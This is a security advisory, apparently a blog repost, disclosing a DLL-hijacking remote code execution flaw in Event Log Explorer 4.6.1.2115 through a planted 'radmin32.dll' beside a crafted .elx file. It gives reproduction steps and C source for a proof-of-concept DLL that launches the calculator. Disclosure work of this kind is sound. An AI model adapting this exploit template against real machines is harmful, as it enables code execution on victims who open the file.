Event Log Explorer 4.6.1.2115 – Remote Code Execution

An arbitrary remote code execution vulnerability has been discovered in the official Event Log Explorer software. Event Log Explorer allows the execution of arbitrary code via a file named « radmin32.dll » just create a file with an extension (.elx) and inserted it into a share folder that contains the « radmin32 » DLL. dll « the victim will click on the file (.elx) that opens by default with the Event Log Explorer software and the arbitrary DLL will run on the system.

Product & Service Introduction:
===============================

Event Log Explorer is an effective software solution for viewing, analyzing and monitoring events recorded in Microsoft Windows event logs.

(Copy of the Vendor Homepage: https://eventlogxp.com/)

Date of Discovery:
==================

2018-09-15

Exploitation Technique:
=======================

Remote

Platfom Tested:
===============

Windows 7 & 10

Levels Risk :

Proof of Concept (PoC):
=======================

For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Event Log Explorer
2.Create a new file with the extension (.elx)
3.Create a DLL and rename it to "radmin32.dll"
4.Put in a folder the file (.elx) and the malicious DLL
5.Open the file (.elx)
6.Now the calculator executes!

--- DLL Exploit ---
#include 
#define DLLIMPORT __declspec (dllexport)

/* Code that allows the calculator to run */

DLLIMPORT void HrCreateConverter() { evil(); }

int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*